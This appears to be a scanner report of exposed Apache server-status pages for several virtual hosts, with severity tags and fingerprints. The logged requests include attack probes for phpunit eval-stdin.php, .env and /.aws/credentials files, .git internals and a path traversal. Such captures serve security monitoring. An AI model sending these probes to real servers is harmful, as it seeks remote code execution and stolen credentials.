127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-45859410/73/885_ 2.7038901140260.00.242.42 127.0.0.1http/1.1hnstream.com:8000GET /robots.txt HTTP/1.1 0-45859410/68/908_ 2.673254163530.00.162.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/info/exclude HTTP/1.1 0-45859410/79/893_ 2.6924514155020.00.282.45 127.0.0.1http/1.1api.hnstream.com:8000GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1 0-45859410/70/908_ 2.6824253123100.00.243.01 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/shallow HTTP/1.1 0-45859410/66/908_ 2.6824293125180.00.262.73 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/refs/remotes/origin/master HTTP/1.1 0-45859410/69/897_ 2.7103121480.00.262.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-45859410/76/882_ 2.7124128760.00.352.54 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-45859410/67/911_ 2.6824453120760.00.212.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/HEAD HTTP/1.1 0-45859410/72/893_ 2.6924346631940.00.272.71 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 0-45859410/76/909_ 2.6924365115720.00.242.60 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 0-45859410/66/893_ 2.7019811440570.00.222.77 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/42/614_ 1.828970109570.00.202.19 127.0.0.1http/1.1hnstream.com:8000HEAD /home HTTP/1.1 1-45558310/44/610_ 1.7823560112370.00.121.73 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/31/582_ 1.792299587060.00.071.93 127.0.0.1http/1.1api.hnstream.com:8000GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-45558310/44/614_ 1.782309489910.00.092.13 127.0.0.1http/1.1api.hnstream.com:8000GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 1-45558310/36/613_ 1.818990110740.00.081.84 127.0.0.1http/1.1hnstream.com:8000HEAD /wp HTTP/1.1 1-45558310/31/595_ 1.802361486900.00.151.92 127.0.0.1http/1.1api.hnstream.com:8000GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php H 1-45558310/37/621_ 1.82898085920.00.112.22 127.0.0.1http/1.1hnstream.com:8000HEAD /new HTTP/1.1 1-45558310/35/603_ 1.808925583110.00.091.84 127.0.0.1http/1.1api.hnstream.com:8000GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-45558310/30/609_ 1.772355387610.00.071.67 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/hooks/pre-receive HTTP/1.1 1-45558310/43/605_ 1.802339497690.00.101.98 127.0.0.1http/1.1api.hnstream.com:8000GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1-45558310/38/608_ 1.828980594120.00.092.00 127.0.0.1http/1.1hnstream.com:8000HEAD /backup HTTP/1.1 1-45558310/39/611_ 1.82898084850.00.091.97 127.0.0.1http/1.1hnstream.com:8000HEAD /old HTTP/1.1 1-45558310/39/604_ 1.81899077590.00.091.66 127.0.0.1http/1.1hnstream.com:8000HEAD /wordpress HTTP/1.1 1-45558310/40/600_ 1.82898083730.00.362.46 127.0.0.1http/1.1hnstream.com:8000HEAD /main HTTP/1.1 1-45558310/42/626_ 1.802304592220.00.091.96 127.0.0.1http/1.1api.hnstream.com:8000GET /containers/json HTTP/1.1 1-45558310/37/597_ 1.818990581960.00.081.58 127.0.0.1http/1.1hnstream.com:8000HEAD /bc HTTP/1.1 1-45558310/40/615_ 1.818980585660.00.091.93 127.0.0.1http/1.1hnstream.com:8000HEAD /bk HTTP/1.1 1-45558310/30/612_ 1.818991100190.00.142.14 127.0.0.1http/1.1hnstream.com:8000HEAD / HTTP/1.1 1-45558310/34/600_ 1.802365586140.00.071.84 127.0.0.1http/1.1api.hnstream.com:8000GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-45558310/41/587_ 1.8023305580930.00.171.68 127.0.0.1http/1.1api.hnstream.com:8000GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTT 1-45558310/28/597_ 1.802309378100.00.062.02 127.0.0.1http/1.1api.hnstream.com:8000GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1 1-45558310/31/590_ 1.802334487590.00.081.98 127.0.0.1http/1.1api.hnstream.com:8000GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HT 1-45558310/37/593_ 1.771034391400.00.092.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/hooks/post-update HTTP/1.1 1-45558310/34/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfcfde2ccf
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Friday, 28-Feb-2025 22:25:42 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 48 days 23 hours 46 minutes 45 seconds Server load: 0.32 0.36 0.36 Total accesses: 51784 - Total Traffic: 151.9 MB - Total Duration: 2171190 CPU Usage: u71.99 s118.97 cu924.39 cs336.84 - .0343% CPU load .0122 requests/sec - 37 B/second - 3076 B/request - 41.9278 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 085941no0yes025000 155831no0yes124000 356175no0yes025000 Sum300 174000 __________________________W_______________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-45859410/13/884_ 0.38260013666050.00.032.31 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/10/847_ 0.442002113149940.00.032.79 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/9/825_ 0.447967115180.00.022.49 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/12/872_ 0.4415336050.00.032.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-45859410/9/806_ 0.3631958126700.00.022.12 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-45859410/9/845_ 0.427224142020.00.022.51 140.248.91.58http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.mermeliz.com/files/summary/ 0-45859410/15/846_ 0.4505132490.00.042.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/11/844_ 0.44229123880.00.102.45 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/13/827_ 0.427914436630.00.042.70 140.248.91.67http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.hefce.ac.uk/kess/gradstemre 0-45859410/13/881_ 0.4415655210.00.032.70 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-45859410/7/817_ 0.44119129200.00.022.43 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-45859410/10/847_ 0.43260510635330.00.022.62 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/10/829_ 0.44105522242270.00.022.39 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/8/862_ 0.447279286400.00.022.34 157.52.85.27http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-45859410/11/823_ 0.3819972635430.00.022.21 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-45859410/11/851_ 0.3810509158460.00.032.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/14/828_ 0.4404150530.00.032.20 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-45859410/11/849_ 0.4332001119720.00.022.80 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-45859410/11/853_ 0.42381110119170.00.022.50 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-45859410/8/836_ 0.4403116990.00.022.17 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-45859410/15/821_ 0.4423122830.00.102.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-45859410/8/852_ 0.4241884117030.00.022.26 140.248.91.39http/1.1api.hnstream.com:8000GET /comments/stream//%22https://www.gov.uk/government/publicat 0-45859410/8/829_ 0.3441835624480.00.022.45 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-45859410/12/845_ 0.4041884110010.00.022.38 140.248.91.63http/1.1api.hnstream.com:8000GET /comments/stream//%22http://archive.boston.com/news/globe/i 0-45859410/9/836_ 0.3638062436420.00.022.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server-status HTTP/1.1 1-45558310/16/588_ 0.6315107020.00.032.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-455583111/15/581W 0.6000109420.00.031.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-45558310/12/563_ 0.6125082085590.00.021.89 148.113.214.206http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/17/587_ 0.603646487930.00.042.08 140.248.91.23http/1.1api.hnstream.com:8000GET /comments/stream//%22http://ionide.io/%22 HTTP/1.1 1-45558310/13/590_ 0.63440104840.00.031.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/12/576_ 0.630385710.00.021.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-45558310/14/598_ 0.631483940.00.032.14 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-45558310/13/581_ 0.631379400.00.031.78 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-45558310/13/592_ 0.603664486830.00.031.62 140.248.91.59http/1.1api.hnstream.com:8000GET /comments/stream//%22http://docs.aws.amazon.com/AWSCloudFor 1-45558310/14/576_ 0.613664093800.00.031.90 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/14/584_ 0.632390250.00.031.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-45558310/17/589_ 0.633379650.00.031.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-45558310/14/579_ 0.601394374090.00.031.60 140.248.91.38http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.hercules-390.eu/%22 HTTP/1. 1-45558310/12/572_ 0.632481340.00.022.12 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-45558310/16/600_ 0.603203589010.00.041.91 140.248.91.49http/1.1api.hnstream.com:8000GET /comments/stream//%22http://turing.deepart.io:3838//%22 HTT 1-45558310/11/571_ 0.60311476910.00.031.52 140.248.91.43http/1.1api.hnstream.com:8000GET /comments/stream//%22http://www.queensmuseum.org/2016/01/he 1-45558310/18/593_ 0.633581770.00.041.88 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-45558310/10/592_ 0.62316395380.00.022.02 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-45558310/13/579_ 0.630384210.00.021.80 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-45558310/15/561_ 0.603651578160.00.041.55 140.248.91.73http/1.1api.hnstream.com:8000GET /comments/stream//%22http://everything2.com/title/Women+are 1-45558310/11/580_ 0.6132084276850.00.031.98 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-45558310/12/571_ 0.5436591484930.00.031.93 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-45558310/12/568_ 0.602504588320.00.032.06 148.113.214.206http/1.1 1-45558310
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf5b29b252
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 27-Feb-2025 03:44:36 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 47 days 5 hours 5 minutes 38 seconds Server load: 0.49 0.45 0.42 Total accesses: 49598 - Total Traffic: 145.8 MB - Total Duration: 1698454 CPU Usage: u71.79 s115.84 cu919.68 cs334.35 - .0353% CPU load .0122 requests/sec - 37 B/second - 3083 B/request - 34.2444 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03975703no0yes025000 23975704no0yes124000 Sum200 149000 _________________________.........................______________ ________W__..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4539757030/53/848_ 2.0014646410.00.102.23 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-4539757030/56/819_ 2.00343132130.00.212.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/49/798_ 2.0023100070.00.192.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4539757030/52/841_ 1.9932994313290.00.122.41 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/51/779_ 2.0103109840.00.102.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-4539757030/50/816_ 2.0025122790.00.122.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4539757030/42/814_ 1.96149846112280.00.112.37 140.248.77.100http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 0-4539757030/48/813_ 2.00317103080.00.182.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4539757030/45/793_ 2.0103101410.00.112.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-4539757030/58/850_ 2.0023635110.00.142.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4539757030/46/795_ 1.96196035112300.00.092.36 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/56/820_ 1.96252759618150.00.202.55 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/57/798_ 2.00424223300.00.282.31 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/51/832_ 2.0019651266990.00.192.26 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/45/795_ 1.96306429616670.00.112.14 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/53/823_ 1.9932985138990.00.202.52 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/47/800_ 2.0103130790.00.112.12 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 0-4539757030/53/821_ 2.0013101750.00.112.72 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-4539757030/50/821_ 2.001399170.00.142.42 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4539757030/46/810_ 1.9930391096840.00.172.10 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/49/787_ 1.9930640104300.00.112.15 194.0.234.51http/1.1api.hnstream.com:8000\x03 0-4539757030/48/824_ 1.9632931396550.00.142.18 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/48/801_ 1.96303467606080.00.192.38 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/43/813_ 1.9925324392190.00.172.24 127.0.0.1http/1.1api.hnstream.com:8000GET /login.rsp HTTP/1.1 0-4539757030/50/805_ 2.0015031419680.00.152.49 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/572. 0.00531848192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00531848492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.005318482671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.005318481174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00531848388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00531848070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00531848369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00531848563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00531848670490.00.001.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00531848077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00531848476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00531848667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.005318481259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00531848668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00531848474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00531848363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00531848465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00531848380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00531848569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00531848464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00531848061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00531848368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00531848173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00531848364570.00.001.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/581. 0.005318482156490.00.001.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf57040b4a
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Monday, 24-Feb-2025 22:54:13 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 45 days 15 minutes 16 seconds Server load: 0.27 0.43 0.44 Total accesses: 47161 - Total Traffic: 138.4 MB - Total Duration: 636159 CPU Usage: u65.97 s109.1 cu919.68 cs334.35 - .0367% CPU load .0121 requests/sec - 37 B/second - 3078 B/request - 13.4891 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03975703no0yes025000 23975704no0yes124000 Sum200 149000 _________________________.........................______________ ________W__..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-4539757030/10/805_ 0.4120221139870.00.022.14 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 0-4539757030/12/775_ 0.41276411127510.00.032.50 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/9/758_ 0.3827591894670.00.022.25 157.52.109.55http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/10/799_ 0.4204118770.00.022.30 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 0-4539757030/11/739_ 0.4303103300.00.021.97 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-4539757030/9/775_ 0.37315712117310.00.022.35 103.203.57.20http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/9/781_ 0.4215106650.00.022.28 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 0-4539757030/10/775_ 0.421398870.00.022.13 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-4539757030/9/757_ 0.3824196796480.00.022.52 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-4539757030/11/803_ 0.4124242120930.00.022.49 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-4539757030/8/757_ 0.34111038108650.00.012.28 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /robots.txt HTTP/1.1 0-4539757030/12/776_ 0.42225111810.00.102.44 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/10/751_ 0.42119104380.00.022.05 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-4539757030/10/791_ 0.4223108950.00.102.16 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/8/758_ 0.38201759109460.00.022.05 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-4539757030/10/780_ 0.4111170132610.00.022.34 127.0.0.1http/1.1hnstream.com:8000HEAD /wordpress HTTP/1.1 0-4539757030/10/763_ 0.4111171125090.00.022.03 127.0.0.1http/1.1hnstream.com:8000HEAD / HTTP/1.1 0-4539757030/10/778_ 0.411117095260.00.022.63 127.0.0.1http/1.1hnstream.com:8000HEAD /wp HTTP/1.1 0-4539757030/12/783_ 0.411116094110.00.052.33 127.0.0.1http/1.1hnstream.com:8000HEAD /bc HTTP/1.1 0-4539757030/12/776_ 0.421116093260.00.021.94 127.0.0.1http/1.1hnstream.com:8000HEAD /backup HTTP/1.1 0-4539757030/8/746_ 0.4111160100340.00.022.05 127.0.0.1http/1.1hnstream.com:8000HEAD /bk HTTP/1.1 0-4539757030/9/785_ 0.421116092500.00.042.08 127.0.0.1http/1.1hnstream.com:8000HEAD /old HTTP/1.1 0-4539757030/9/762_ 0.4211160100390.00.012.21 127.0.0.1http/1.1hnstream.com:8000HEAD /new HTTP/1.1 0-4539757030/9/779_ 0.421115084400.00.012.08 127.0.0.1http/1.1hnstream.com:8000HEAD /main HTTP/1.1 0-4539757030/12/767_ 0.4211150103310.00.052.38 127.0.0.1http/1.1hnstream.com:8000HEAD /home HTTP/1.1 1-41-0/0/572. 0.00341625192910.00.001.99 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/566. 0.00341625492890.00.001.60 127.0.0.1http/1.1api.hnstream.com:8000GET /favicon.ico HTTP/1.1 1-41-0/0/551. 0.003416252671380.00.001.87 127.0.0.1http/1.1chat.fanoutapp.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.003416251174840.00.002.04 127.0.0.1http/1.1api.hnstream.com:8000GET /sitemap.xml HTTP/1.1 1-41-0/0/577. 0.00341625388730.00.001.76 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /node_modules/.env HTTP/1.1 1-41-0/0/564. 0.00341625070610.00.001.76 45.91.171.220http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/584. 0.00341625369020.00.002.11 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /laravel/.env.production HTTP/1.1 1-41-0/0/568. 0.00341625563000.00.001.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/jquery-3.2.1.min.js HTTP/1.1 1-41-0/0/579. 0.00341625670490.00.001.60 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/562. 0.00341625077350.00.001.88 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/570. 0.00341625476630.00.001.91 147.185.133.181http/1.1api.hnstream.com:8000\x16\x03\x01 1-41-0/0/572. 0.00341625667370.00.001.88 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/565. 0.003416251259750.00.001.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.dev.local HTTP/1.1 1-41-0/0/560. 0.00341625668420.00.002.10 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/584. 0.00341625474080.00.001.87 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.template HTTP/1.1 1-41-0/0/560. 0.00341625363610.00.001.50 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.prod HTTP/1.1 1-41-0/0/575. 0.00341625465100.00.001.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.local HTTP/1.1 1-41-0/0/582. 0.00341625380920.00.002.00 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 1-41-0/0/566. 0.00341625569260.00.001.77 157.52.72.35http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-41-0/0/546. 0.00341625464820.00.001.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /laravel/core/.env.staging HTTP/1.1 1-41-0/0/569. 0.00341625061800.00.001.95 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-41-0/0/559. 0.00341625368030.00.001.91 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/ot.js HTTP/1.1 1-41-0/0/556. 0.00341625173980.00.002.03 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/555. 0.00341625364570.00.001.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-41-0/0/581. 0.003416252156490.00.001.66 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /static/editor/codemirror.js HTTP/1.1 2-4539757040/23/569_ 0.7614004116300.00.071.60 127.0.0.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf2f7e6b5a
